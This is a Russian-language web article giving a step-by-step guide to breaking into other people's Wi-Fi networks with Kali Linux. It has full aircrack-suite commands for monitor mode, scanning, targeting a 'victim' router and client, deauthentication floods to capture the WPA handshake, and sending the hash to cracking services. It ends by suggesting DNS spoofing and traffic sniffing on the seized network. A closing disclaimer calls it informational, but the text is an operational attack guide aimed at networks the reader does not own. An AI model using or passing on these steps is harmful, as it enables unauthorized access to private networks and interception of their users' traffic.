Каталог статей
Главная » Статьи » Мои статьи |
1. Скачиваем kali linux 1.1 Устанавливаем кали линукс на флешку или виртуальную машину 1.3 Запускаемся с флешки или виртуальной машины под кали 2. Открываем консоль 2.1 Пишем: iwconfig и проверяем, определяется ли наша сетевая карта! Если у вас на этом моменте проблемы(с ноутбуками такого не будет), то вам нужно докупить эту карту. За 300 рублей можно взять юсб карту тплинк с алика и все будет в шоколаде. 2.2 Теперь включаем режим мониторинга: airmon-ng start wlan0(влан0 - это значение из параметров сетевой карты, у вас оно может быть немного иное, например mon0) 2.3 Теперь нужно провести сканирование: airodump-ng wlan0 2.4 Здесь мы увидим список вай фай сетей в радиусе нашего аппарата, зависит от сетевой карты. Здесь нужно выбрать объект атаки, выбираем на свой вкус, я обычно беру того у кого сигнал лучше(Уровень сигнала определяется сокращением pwr) 2.5 Теперь нам нужно нажать ctrl+c и остановить сканирование 2.6 Выбрали жертву и пишем: airodump-ng --bssid (здесь пишем бссайди роутера жертвы, его вы видите выше) --channel(тут пишем канал, он обозначивается как ch, например 1 или 8) -w /tmp/nazvanie (это путь где будет конечный файл и название) wlan0 2.7 В самом низу видим тех, кто подключен к сети, выбираем того у кого в значении Frames большее количество(он более активен) 3. Открываем еще одну консоль и пишем: aireplay-ng -0 1(1 - это кол-во пакетов деавторизации, ставьте сразу 50 и ждите) -а (здесь пишем бссайди роутера, его видим в самой верхней строке где его характеристики: уровень сигнала, канал и тд) -с (мак адрес пользователя, которого атакуем, узнать его мак можно под надписью STATION) wlan0 3.1 Ждем пока в первой консоли будет надпись с хендшейком, там еще время будет указано, она будет вверху. Делаем во второй консоли эту команду пока не пройдет хендшейк. Если совсем не проходит, то пишем эту команду заместо той: aireplay-ng -0 1 -a AP_BSSID -c CLIENT_BSSID mon0 —ignore-negative-one( это для андроид устройств), еще можно деавторизовать сразу всю сеть aireplay-ng --deauth 5 -a (тут прописываешь мак роутера) wlan0 4. Когда получили хендшейк, идем по пути который мы указали и: 4.1 Расшифровываем этот хеш сами, даем людям которые могут это сделать 4.2 Обращаемся к сервису xsrc и кидаем сюда хеш, он быстро находит(у меня за пару секунд), может быть дольше, но явно быстрее чем на моем ноуте 2009 года :D После расшифровки вам на почту придет письмо-оповещение, а чтобы получить пароль нужен ключ, 1 стоит 100 рублей, чем больше - тем дешевле. Это единственный минус этого способа, но я предпочитаю его. После покупки ключа он придет на почту, далее вводите его на сайте и готово. Вот и готово, далее с нашей, теперь нашей! сетью делаем что хотим: подменяем днс, слушаем трафик или просто смотрит фильмы и сидим на нашем любимом форуме :) PPS. Если есть вопросы, задавайте их только в этой теме! Потому что тем самым мы можем помочь сразу нескольким людям, у которых один вопрос.(и набить вам, новичкам, сообщения :D) UPD. http://wpa-sec.stanev.org/ Сервис для бесплатной расшифровки хешей, предоставил YouNigger
материал предоставлен в ознакомительных целях | |
Просмотров: 405 | | |
Всего комментариев: 0 | |